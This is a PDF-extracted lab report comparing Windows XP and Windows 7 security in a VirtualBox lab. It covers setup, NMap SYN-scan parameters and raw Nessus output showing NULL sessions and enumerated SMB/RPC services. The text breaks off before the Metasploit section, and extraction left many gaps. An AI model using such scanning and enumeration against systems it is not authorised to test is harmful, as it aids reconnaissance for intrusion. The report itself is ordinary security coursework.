Enterprise Architecture Testing

7/27/2019 Enterprise Architecture Testing

http://slidepdf.com/reader/full/enterprise-architecture-testing 1/73

V AN TAGE POI N T COM PUTI N G

BEN DAHL



PAGE | 2

CONTENTS

Purpose .............................................................................................................................................................................................................................................. 3

Schedule ............................................................................................................................................................................................................................................ 4

Acquisitions ..................................................................................................................................................................................................................................... 5

Installation ....................................................................................................................................................................................................................................... 6

Patch Management and Configuration ............................................................................................................................................................................... 9

Network Discovery (NMap) ................................................................................................................................................................................................... 12

Network Map .......................................................................................................................................................................................................................... 12

Windows XP ............................................................................................................................................................................................................................ 13

Windows 7 ............................................................................................................................................................................................................................... 14

Vulnerability Scanning (Nessus) ......................................................................................................................................................................................... 15

Windows XP ............................................................................................................................................................................................................................ 15

Windows 7 ............................................................................................................................................................................................................................... 22

Penetration Testing (Metasploit) ........................................................................................................................................................................................ 59 Exploits ...................................................................................................................................................................................................................................... 59

Microsoft Server Service Relative Path Stack Corruption........................................................................................................................... 59

Internet Explorer XML Core Services HTTP Request Handling ............................................................................................................... 60

Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution ...................................................................................... 61

Payloads .................................................................................................................................................................................................................................... 62

Windows Meterpreter (Reflective Injection), Bind TCP Stager ............................................................................................................... 62

Windows Meterpreter (Reflective Injection), Reverse TCP Stager ........................................................................................................ 62

Windows XP ............................................................................................................................................................................................................................ 63

Test 1 .................................................................................................................................................................................................................................... 63

Test 2 .................................................................................................................................................................................................................................... 63

Test 3 .................................................................................................................................................................................................................................... 64

Test 4 .................................................................................................................................................................................................................................... 64

Test 5 .................................................................................................................................................................................................................................... 65

Test 6 .................................................................................................................................................................................................................................... 65

Windows 7 ............................................................................................................................................................................................................................... 67

Test 1 .................................................................................................................................................................................................................................... 67

Test 2 .................................................................................................................................................................................................................................... 67

Test 3 .................................................................................................................................................................................................................................... 68

Test 4 .................................................................................................................................................................................................................................... 68 Test 5 .................................................................................................................................................................................................................................... 69

Test 6 .................................................................................................................................................................................................................................... 71

Conclusion ...................................................................................................................................................................................................................................... 72



PAGE | 3

PURPOSE

Information is the most critical asset in any organization. Proprietary data,

information, and knowledge are just as valuable to a business as tangible assets. As such,

information needs to be suitably protected and secured in a fashion as rigorous as that of

other business assets. This is especially important with the increasing number of

vulnerabilities and threats and the interconnected nature of the business environment.

The Windows Operating Environment is the most common environment in the

corporate world. Currently, Windows XP represents the largest share of the market, but

Windows 7 looms on the horizon. Given a clean installation of the Windows Operating

Environment and physical access to the network, which operating system, Windows XP or

Windows 7, is more secure?

In order to execute this scenario, a lab environment will be created for testing

purposes. The lab will consist of one physical server with VirtualBox and two virtual

machines. One virtual machine will have Windows XP and the other will have Windows 7

(Both acquired through DePaul via the MSDNAA). All tests will be performed with NETLAB

(the physical server) in a manner similar to those used in the Vantage Point Computing

Security Policy.

Evaluation will be done in a manner similar to IS433 and IS533 classes at DePaul. In

concurrence with the following schedule, an infrastructure will be established and verified.

This will be followed by testing with NMAP, Nessus, and Metasploit to determine the

potential vulnerabilities and then test their weaknesses.

Ultimately, the final goal is to verify the security of the two Windows versions.

Windows XP has been tested, patched, and service packed over the course of almost a

decade. Windows 7 has been publicly available for less than a year. Did Microsoft learn

from their mistakes with Windows XP? Are all the vulnerabilities that were patched

throughout the lifecycle of Windows XP still secure, or are they open in Windows 7?

Furthermore, is the upgrade to Windows 7 recommended for enterprise use, or only for

home use? Throughout the course of testing these questions, along with many others will

be answered.



PAGE | 4

SCHEDULE

• Week One: Acquisitions

o Acquire two lab machineso Acquire switch and cables

o Acquire Windows XPo Acquire Windows 7

Deliverable: Lab Environment pictures

• Week Two: Installation

o Install Windows 7o Install Windows XPo Verify network connectivity of lab machines

Deliverable: Windows Desktop Screenshots

• Week Three: Patch Management & Configuration

o Install latest Windows 7 patcheso Install latest Windows XP patcheso Verify network connectivity of WHEELJACKo Verify functionality of testing tools on WHEELJACK

Deliverable: netstat –ano screenshots

• Week Four & Five: NMAP

o Execute NMAP scans to map network

Deliverable: NMAP network map

Deliverable: NMAP Report Draft

• Week Six & Seven: Nessus

o Run Nessus scans on Windows XPo Run Nessus scans on Windows 7

Deliverable: Nessus Report Files Deliverable: Nessus Report Draft

• Week Eight & Nine: Metasploit

o Run Metasploit against Windows XPo Run Metasploit against Windows 7

Deliverable: Metasploit console screenshots

Deliverable: Metasploit Report Draft

• Week Ten:

o Final testingo Revisions

Deliverable: Final project report



PAGE | 5

ACQUISITIONS

o Acquire two lab machines

o Acquire switch and cables

o Acquire Windows XP

o Acquire Windows 7

As opposed to acquiring two separate lab machines, and after discussions with James Krev, the

acquisitions assignment was modified to reflect virtualization using Sun VirtualBox. VirtualBox was

installed on a physical server (NETLAB) running Windows XP.

Additionally, Windows XP and Windows 7 were downloaded and installed as separate virtual

instances within VirtualBox.



PAGE | 6

INSTALLATION

o Install Windows 7

o Install Windows XP

o Verify network connectivity of lab machines

The following screenshots depict the virtual installations of Windows 7.

Windows7: ipconfig /all – To verify network connectivity and acquisition of an IP address.



PAGE | 7

Windows7: netstat – ano – Displays open ports and Process IDs.

The following screenshots depict the virtual installations of Windows XP.

WindowsXP: ipconfig /all – To verify network connectivity and acquisition of an IP address.



PAGE | 8

WindowsXP: netstat – ano – Displays open ports and Process IDs.



PAGE | 9

PATCH MANAGEMENT AND CONFIGURATION

o Install latest Windows 7 patches

o Install latest Windows XP patches

o Verify network connectivity of NETLAB

o Verify functionality of testing tools on NETLAB

The following screenshot depicts the virtual installations of Windows 7.

Windows7: Windows Update – To verify the operating system is patched to the most recent

version.



PAGE | 10

The following screenshot depicts the virtual installations of Windows XP.

WindowsXP: Windows Update – To verify the operating system is patched to the most recent

version.

The following screenshots depict the NETLAB server.

NETLAB: ipconfig/all – To verify network connectivity.



PAGE | 11

NETLAB: Tools (Nessus / NMap / Metasploit)



PAGE | 12

NETWORK DISCOVERY (NMAP)

NMap was used to create a complete network topology of the local area network that NETLAB

(including the virtual machines) is part of.

Local Address 192.168.0.166 is the IP address of the Windows XP virtual machine.Local Address 192.168.0.171 is the IP address of the Windows 7 virtual machine.

NMap was used with the following parameters:

-p1-65535 - Used to specify ports 1-65535

-T4 - Used to specify the timing of the scans

-sS - Specifies NMap runs in stealth syn mode.

192.168.0.1/24 - Scans all hosts on the local network to create the map.

192.168.0.166 - Scans the Windows XP virtual machine.

192.168.0.171 - Scans the Windows XP virtual machine.

NETWORK MAP



PAGE | 13

WINDOWS XP

The NMap scan of Windows XP revealed 65535 scanned ports, all of which were filtered.



PAGE | 14

WINDOWS 7

The NMap scan of the Windows 7 virtual machine scanned 65535 ports, 7 of which were open.



PAGE | 15

VULNERABILITY SCANNING (NESSUS)

WINDOWS XP

192.168.0.166

Scan time :

Start time : Mon Nov 23 14:14:17 2009

End time : Mon Nov 23 14:14:41 2009

Number of vulnerabilities :

Open ports : 5

Low : 8

Medium : 0

High : 0

Information about the remote host :

Operating system : (unknown)

NetBIOS name : WINXP

DNS name : (unknown)



PAGE | 16

Port netbios-ns (137/udp)

Using NetBIOS or SMB to retrieve information from a Windows host

Synopsis :

It is possible to obtain the network name of the remote host.

Description :

The remote host listens on UDP port 137 or TCP port 445 and replies to

NetBIOS nbtscan or SMB requests.

Note that this plugin gathers information to be used in other plugins

but does not itself generate a report.

Solution :

n/a

Risk factor :

None

Plugin output :

The following 6 NetBIOS names have been gathered :

WINXP = Computer name

WORKGROUP = Workgroup / Domain name

WINXP = File Server Service

WORKGROUP = Browser Service Elections

WORKGROUP = Master Browser

__MSBROWSE__ = Master Browser

The remote host has the following MAC address on its adapter :

08:00:27:09:16:8a

Nessus ID : 10150

http://www.nessus.org/plugins/index.php?view=single&id=10150






PAGE | 17

Port microsoft-ds (445/tcp)

SMB Detection

Synopsis :

A file / print sharing service is listening on the remote host.

Description :

The remote service understands the CIFS (Common Internet File System)

or Server Message Block (SMB) protocol, used to provide shared access

to files, printers, etc between nodes on a network.

Solution :

n/a

Risk factor :

None

Plugin output :

A CIFS server is running on this port.

Nessus ID : 11011

SMB NativeLanMan

Synopsis :

It is possible to obtain information about the remote operating

system.

Description :

It is possible to get the remote operating system name and

version (Windows and/or Samba) by sending an authentication

request to port 139 or 445.

Solution :







PAGE | 18

n/a

Risk factor :

None

Plugin output :

The remote Operating System is : Windows 5.1

The remote native lan manager is : Windows 2000 LAN Manager

The remote SMB Domain Name is : WINXP

Nessus ID : 10785

SMB log in

Synopsis :

It is possible to log into the remote host.

Description :

The remote host is running one of the Microsoft Windows operating

systems. It was possible to log into it using one of the following

account :

- NULL session

- Guest account

- Given Credentials

See also :

http://support.microsoft.com/support/kb/articles/Q143/4/74.ASP


Solution :

n/a

Risk factor :

None













PAGE | 19

Plugin output :

- NULL sessions are enabled on the remote host

CVE : CVE-1999-0504, CVE-1999-0505, CVE-1999-0506, CVE-2000-0222, CVE-2002-1117, CVE-2005-3595BID : 494, 990, 11199

Nessus ID : 10394

SMB LanMan Pipe Server browse listing

Synopsis :

It is possible to obtain network information.

Description :

It was possible to obtain the browse list of the remote Windows system

by send a request to the LANMAN pipe. The browse list is the list of

the nearest Windows systems of the remote host.

Solution :

n/a

Risk factor :

None

Plugin output :

Here is the browse list of the remote host :

WINXP ( os : 5.1 )

Other references : OSVDB:300

Nessus ID : 10397











PAGE | 20

SMB NULL session

Synopsis :

It is possible to log into the remote Windows host with a NULLsession.

Description :

The remote host is running Microsoft Windows, and it was possible to

log into it using a NULL session (ie, with no login or password). An

unauthenticated remote attacker can leverage this issue to get

information about the remote host.

See also :



Solution :

n/a

Risk factor :

None

CVE : CVE-2002-1117BID : 494

Nessus ID : 26920

SMB registry can not be accessed by the scanner

Synopsis :

Nessus is not able to access the remote Windows Registry.

Description :

It was not possible to connect to PIPE\winreg on the remote host.

If you intend to use Nessus to perform registry-based checks, the













PAGE | 21

registry checks will not work because the 'Remote Registry Access'

service (winreg) has been disabled on the remote host or can not be

connected to with the supplied credentials.

Solution :

n/a

Risk factor :

None

Nessus ID : 26917

Port epmap (135/tcp)

Port icslap (2869/tcp)

Port netbios-ssn (139/tcp)

SMB Detection

Synopsis :


Description :

The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol,

used to provide shared access to files, printers, etc between nodes on a network.

Solution :

n/a

Risk factor :

None

Plugin output :

An SMB server is running on this port.

Nessus ID : 11011











PAGE | 22

WINDOWS 7

192.168.0.171

Scan time :

Start time : Mon Nov 23 13:52:49 2009

End time : Mon Nov 23 13:53:33 2009

Number of vulnerabilities :

Open ports : 12

Low : 16

Medium : 0

High : 0

Information about the remote host :

Operating system : (unknown)

NetBIOS name : WIN7

DNS name : (unknown)



PAGE | 23

Port unknown (49155/tcp)

DCE Services Enumeration

Synopsis :

A DCE/RPC service is running on the remote host.

Description :

By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the

Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible t

connect and bind to each service by sending an RPC request to the remote port/pipe.

Solution :

N/A

Risk factor :

None

Plugin output :

The following DCERPC services are available on TCP port 49155 :

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0Description : Security Account Manager

Windows process : lsass.exe

Type : Remote RPC service

TCP Port : 49155

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0

Description : Unknown RPC service

Annotation : KeyIso

Type : Remote RPC serviceTCP Port : 49155

IP : 192.168.0.171

Nessus ID : 10736







PAGE | 24

Port netbios-ns (137/udp)

Using NetBIOS or SMB to retrieve information from a Windows host

Synopsis :

It is possible to obtain the network name of the remote host.

Description :

The remote host listens on UDP port 137 or TCP port 445 and replies to

NetBIOS nbtscan or SMB requests.

Note that this plugin gathers information to be used in other plugins

but does not itself generate a report.

Solution :

n/a

Risk factor :

None

Plugin output :

The following 6 NetBIOS names have been gathered :

WIN7 = Computer name

WORKGROUP = Workgroup / Domain name

WIN7 = File Server Service

WORKGROUP = Browser Service Elections

WORKGROUP = Master Browser

__MSBROWSE__ = Master Browser

The remote host has the following MAC address on its adapter :

08:00:27:ef:92:b3

Nessus ID : 10150







PAGE | 25



Synopsis :


Description :

By sending a Lookup request to the portmapper (TCP 135 or epmapper

PIPE) it was possible to enumerate the Distributed Computing Environment

(DCE) services running on the remote port.

Using this information it is possible to connect and bind to

each service by sending an RPC request to the remote port/pipe.

Solution :

N/A

Risk factor :

None

Plugin output :


Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 367abb81-9844-35f1-ad32-98f038001003, version 2.0



TCP Port : 49156

IP : 192.168.0.171

Nessus ID : 10736







PAGE | 26



Synopsis :


Description :






Solution :

N/A

Risk factor :

None

Plugin output :


Object UUID : 00000000-0000-0000-0000-000000000000

UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0


Annotation : Event log TCPIP


TCP Port : 49153

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0

Description : Unknown RPC serviceAnnotation : NRP server endpoint


TCP Port : 49153

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000



PAGE | 27

UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0

Description : DHCP Client Service

Windows process : svchost.exe

Annotation : DHCP Client LRPC Endpoint


TCP Port : 49153IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000



Annotation : DHCPv6 Client LRPC Endpoint


TCP Port : 49153

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0


Annotation : Security Center


TCP Port : 49153

IP : 192.168.0.171

Nessus ID : 10736



Synopsis :


Description :











PAGE | 28


Solution :

N/A

Risk factor :

None

Plugin output :


Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0



TCP Port : 49154

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0


Annotation : IP Transition Configuration endpoint


TCP Port : 49154

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0


Annotation : XactSrv service


TCP Port : 49154

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0

Description : Unknown RPC serviceAnnotation : AppInfo


TCP Port : 49154

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000



PAGE | 29

UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0


Annotation : AppInfo


TCP Port : 49154

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0




TCP Port : 49154

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0




TCP Port : 49154

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0


Annotation : IKE/Authip API


TCP Port : 49154IP : 192.168.0.171

Nessus ID : 10736







PAGE | 30



Synopsis :


Description :






Solution :

N/A

Risk factor :

None

Plugin output :


Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91

UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0



TCP Port : 49152

IP : 192.168.0.171

Nessus ID : 10736







PAGE | 31

Port microsoft-ds (445/tcp)

SMB Detection

Synopsis :


Description :




Solution :

n/a

Risk factor :

None

Plugin output :

A CIFS server is running on this port.

Nessus ID : 11011


Synopsis :


Description :

By sending a Lookup request to the portmapper (TCP 135 or epmapperPIPE) it was possible to enumerate the Distributed Computing Environment




Solution :







PAGE | 32

N/A

Risk factor :

None

Plugin output :

The following DCERPC services are available remotely :





Named pipe : \PIPE\InitShutdown

Netbios name : \\WIN7

Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000

UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0



Named pipe : \PIPE\InitShutdown


Object UUID : 00000000-0000-0000-0000-000000000000

UUID : b58aa02e-2884-4e97-8176-4ee06d794184, version 1.0


Type : Remote RPC serviceNamed pipe : \pipe\trkwks


Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0

Description : Security Account Manager



Named pipe : \pipe\lsass


Object UUID : 00000000-0000-0000-0000-000000000000





Named pipe : \PIPE\protected_storage



PAGE | 33


Object UUID : 00000000-0000-0000-0000-000000000000



Annotation : KeyIsoType : Remote RPC service

Named pipe : \pipe\lsass


Object UUID : 00000000-0000-0000-0000-000000000000



Annotation : KeyIso


Named pipe : \PIPE\protected_storage


Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0

Description : Scheduler Service



Named pipe : \PIPE\atsvc


Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0

Description : Scheduler ServiceWindows process : svchost.exe




Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000







PAGE | 34



Object UUID : 00000000-0000-0000-0000-000000000000


Description : Unknown RPC serviceAnnotation : XactSrv service




Object UUID : 00000000-0000-0000-0000-000000000000







Object UUID : 00000000-0000-0000-0000-000000000000





Named pipe : \PIPE\srvsvc


Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0Description : Unknown RPC service



Named pipe : \PIPE\browser


Object UUID : 00000000-0000-0000-0000-000000000000




Type : Remote RPC serviceNamed pipe : \PIPE\atsvc


Object UUID : 00000000-0000-0000-0000-000000000000





PAGE | 35





Object UUID : 00000000-0000-0000-0000-000000000000UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0






Object UUID : 00000000-0000-0000-0000-000000000000







Object UUID : 00000000-0000-0000-0000-000000000000







Object UUID : 00000000-0000-0000-0000-000000000000







Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000



PAGE | 36







Object UUID : 00000000-0000-0000-0000-000000000000







Object UUID : 00000000-0000-0000-0000-000000000000







Object UUID : 00000000-0000-0000-0000-000000000000





Named pipe : \PIPE\srvsvcNetbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000







Object UUID : 00000000-0000-0000-0000-000000000000UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0




Named pipe : \pipe\eventlog




PAGE | 37

Object UUID : 00000000-0000-0000-0000-000000000000



Annotation : NRP server endpoint

Type : Remote RPC serviceNamed pipe : \pipe\eventlog


Object UUID : 00000000-0000-0000-0000-000000000000








Object UUID : 00000000-0000-0000-0000-000000000000







Object UUID : 00000000-0000-0000-0000-000000000000


Description : Unknown RPC serviceAnnotation : Security Center




Nessus ID : 10736

SMB NativeLanMan

Synopsis :

It is possible to obtain information about the remote operating

system.

Description :







PAGE | 38

It is possible to get the remote operating system name and

version (Windows and/or Samba) by sending an authentication

request to port 139 or 445.

Solution :

n/a

Risk factor :

None

Plugin output :

The remote Operating System is : Windows 7 Professional 7600

The remote native lan manager is : Windows 7 Professional 6.1

The remote SMB Domain Name is : WIN7

Nessus ID : 10785

SMB log in

Synopsis :

It is possible to log into the remote host.

Description :

The remote host is running one of the Microsoft Windows operating

systems. It was possible to log into it using one of the following

account :

- NULL session

- Guest account

- Given Credentials

See also :



Solution :













PAGE | 39

n/a

Risk factor :

None

Plugin output :

- NULL sessions are enabled on the remote host

CVE : CVE-1999-0504, CVE-1999-0505, CVE-1999-0506, CVE-2000-0222, CVE-2002-1117, CVE-2005-3595

BID : 494, 990, 11199

Nessus ID : 10394

SMB LanMan Pipe Server browse listing

Synopsis :

It is possible to obtain network information.

Description :

It was possible to obtain the browse list of the remote Windows system

by send a request to the LANMAN pipe. The browse list is the list of

the nearest Windows systems of the remote host.

Solution :

n/a

Risk factor :

None

Plugin output :

Here is the browse list of the remote host :

WIN7 ( os : 6.1 )

Other references : OSVDB:300

Nessus ID : 10397











PAGE | 40

SMB NULL session

Synopsis :

It is possible to log into the remote Windows host with a NULLsession.

Description :

The remote host is running Microsoft Windows, and it was possible to

log into it using a NULL session (ie, with no login or password). An

unauthenticated remote attacker can leverage this issue to get

information about the remote host.

See also :



Solution :

n/a

Risk factor :

None

CVE : CVE-2002-1117BID : 494

Nessus ID : 26920

SMB registry can not be accessed by the scanner

Synopsis :

Nessus is not able to access the remote Windows Registry.

Description :

It was not possible to connect to PIPE\winreg on the remote host.

If you intend to use Nessus to perform registry-based checks, the registry checks will not work because the 'Remote

Registry Access' service (winreg) has been disabled on the remote host or can not be connected to with the supplied













PAGE | 41

credentials.

Solution :

n/a

Risk factor : None

Nessus ID : 26917

Port epmap (135/tcp)


Synopsis :


Description :






Solution :

N/A

Risk factor :

None

Plugin output :

The following DCERPC services are available locally :




Type : Local RPC service

Named pipe : WindowsShutdown







PAGE | 42





Named pipe : WMsgKRpc0436C0





Named pipe : WindowsShutdown





Named pipe : WMsgKRpc0436C0

Object UUID : 6d726574-7273-0076-0000-000000000000

UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0


Annotation : Impl friendly name


Named pipe : LRPC-c6a2c9660bb6328c4f

Object UUID : 52ef130c-08fd-4388-86b3-6edf00000001

UUID : 12e65dd8-887f-41ef-91bf-8d816c42c2e7, version 1.0


Annotation : Secure Desktop LRPC interfaceType : Local RPC service

Named pipe : WMsgKRpc043881





Named pipe : WMsgKRpc043881

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0Description : IPsec Services (Windows XP & 2003)


Annotation : IPSec Policy agent endpoint


Named pipe : LRPC-ca5f5144be75bc564b



PAGE | 43

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 6b5bdd1e-528c-422c-af8c-a4079be4fe48, version 1.0


Annotation : Remote Fw APIs


Named pipe : LRPC-ca5f5144be75bc564b

Object UUID : 00000000-0000-0000-0000-000000000000




Named pipe : OLE25D40AF7017C4837B051B3DE1DA2

Object UUID : 00000000-0000-0000-0000-000000000000




Named pipe : trkwks

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 8174bb16-571b-4c38-8386-1102b449044a, version 1.0



Named pipe : LRPC-92b6673cbb004993d5

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : a2d47257-12f7-4beb-8981-0ebfa935c407, version 1.0


Type : Local RPC serviceNamed pipe : LRPC-92b6673cbb004993d5

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 3f31c91e-2545-4b7b-9311-9529e8bffef6, version 1.0



Named pipe : LRPC-92b6673cbb004993d5

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 4b112204-0e19-11d3-b42b-0000f81feb9f, version 1.0

Description : SSDP serviceWindows process : unknow


Named pipe : LRPC-4348df7c4ffce47473

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : dd490425-5325-4565-b774-7e27d6c09c24, version 1.0



PAGE | 44


Annotation : Base Firewall Engine API


Named pipe : LRPC-5448665e392adc7390

Object UUID : 00000000-0000-0000-0000-000000000000UUID : 7f9d11bf-7fb9-436b-a812-b2d50c5d4c03, version 1.0


Annotation : Fw APIs



Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 2fb92682-6599-42dc-ae13-bd2ca89bd11c, version 1.0


Annotation : Fw APIs



Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1, version 1.0


Annotation : Spooler function endpoint


Named pipe : spoolss

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : ae33069b-a2a8-46ee-a235-ddfd339be281, version 1.0

Description : Unknown RPC serviceAnnotation : Spooler base remote object endpoint



Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 4a452661-8290-4b36-8fbe-7f4093a94978, version 1.0


Annotation : Spooler function endpoint



Object UUID : 00000000-0000-0000-0000-000000000000





Named pipe : LRPC-04dfdd309d86a33c86



PAGE | 45

Object UUID : 00000000-0000-0000-0000-000000000000




Type : Local RPC serviceNamed pipe : audit

Object UUID : 00000000-0000-0000-0000-000000000000





Named pipe : securityevent

Object UUID : 00000000-0000-0000-0000-000000000000





Named pipe : LSARPC_ENDPOINT

Object UUID : 00000000-0000-0000-0000-000000000000





Named pipe : lsapolicylookup

Object UUID : 00000000-0000-0000-0000-000000000000





Named pipe : lsasspirpc

Object UUID : 00000000-0000-0000-0000-000000000000



Windows process : lsass.exeType : Local RPC service

Named pipe : protected_storage

Object UUID : 00000000-0000-0000-0000-000000000000





PAGE | 46



Named pipe : samss lpc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0Description : Unknown RPC service

Annotation : KeyIso


Named pipe : LRPC-04dfdd309d86a33c86

Object UUID : 00000000-0000-0000-0000-000000000000



Annotation : KeyIso


Named pipe : audit

Object UUID : 00000000-0000-0000-0000-000000000000



Annotation : KeyIso


Named pipe : securityevent

Object UUID : 00000000-0000-0000-0000-000000000000



Annotation : KeyIsoType : Local RPC service

Named pipe : LSARPC_ENDPOINT

Object UUID : 00000000-0000-0000-0000-000000000000



Annotation : KeyIso


Named pipe : lsapolicylookup

Object UUID : 00000000-0000-0000-0000-000000000000UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0


Annotation : KeyIso


Named pipe : lsasspirpc



PAGE | 47

Object UUID : 00000000-0000-0000-0000-000000000000



Annotation : KeyIso


Named pipe : protected_storage

Object UUID : 00000000-0000-0000-0000-000000000000



Annotation : KeyIso


Named pipe : samss lpc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0


Annotation : NSI server endpoint


Named pipe : OLEDFFAAD5DBE1B4928A1CFE1851294

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0


Annotation : NSI server endpoint


Named pipe : LRPC-a1978a56cbce044c9e

Object UUID : 00000000-0000-0000-0000-000000000000UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0


Annotation : WinHttp Auto-Proxy Service


Named pipe : OLEDFFAAD5DBE1B4928A1CFE1851294

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0


Annotation : WinHttp Auto-Proxy Service

Type : Local RPC serviceNamed pipe : LRPC-a1978a56cbce044c9e

Object UUID : 666f7270-6c69-7365-0000-000000000000






PAGE | 48


Named pipe : IUserProfile2

Object UUID : 6c637067-6569-746e-0000-000000000000


Description : Unknown RPC serviceAnnotation : Impl friendly name



Object UUID : 24d1f7c7-76af-4f28-9ccd-7f6cb6468601

UUID : 2eb08e3e-639f-4fba-97b1-14f878961076, version 1.0




Object UUID : 24d1f7c7-76af-4f28-9ccd-7f6cb6468601

UUID : 2eb08e3e-639f-4fba-97b1-14f878961076, version 1.0



Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106

Object UUID : 736e6573-0000-0000-0000-000000000000






Object UUID : 736e6573-0000-0000-0000-000000000000






Object UUID : 736e6573-0000-0000-0000-000000000000



Annotation : Impl friendly nameType : Local RPC service

Named pipe : senssvc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0




PAGE | 49




Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0Description : Scheduler Service




Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0





Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000



Windows process : svchost.exeType : Local RPC service


Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0







PAGE | 50

Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000





Object UUID : 00000000-0000-0000-0000-000000000000





Object UUID : 00000000-0000-0000-0000-000000000000


Description : Unknown RPC serviceType : Local RPC service


Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0







PAGE | 51

Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0





Object UUID : 00000000-0000-0000-0000-000000000000




Type : Local RPC serviceNamed pipe : OLEB6ACB6682BC14CC9B4CC0F919106

Object UUID : 00000000-0000-0000-0000-000000000000






PAGE | 52



Object UUID : 00000000-0000-0000-0000-000000000000





Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000






Object UUID : 00000000-0000-0000-0000-000000000000




Type : Local RPC serviceNamed pipe : IUserProfile2

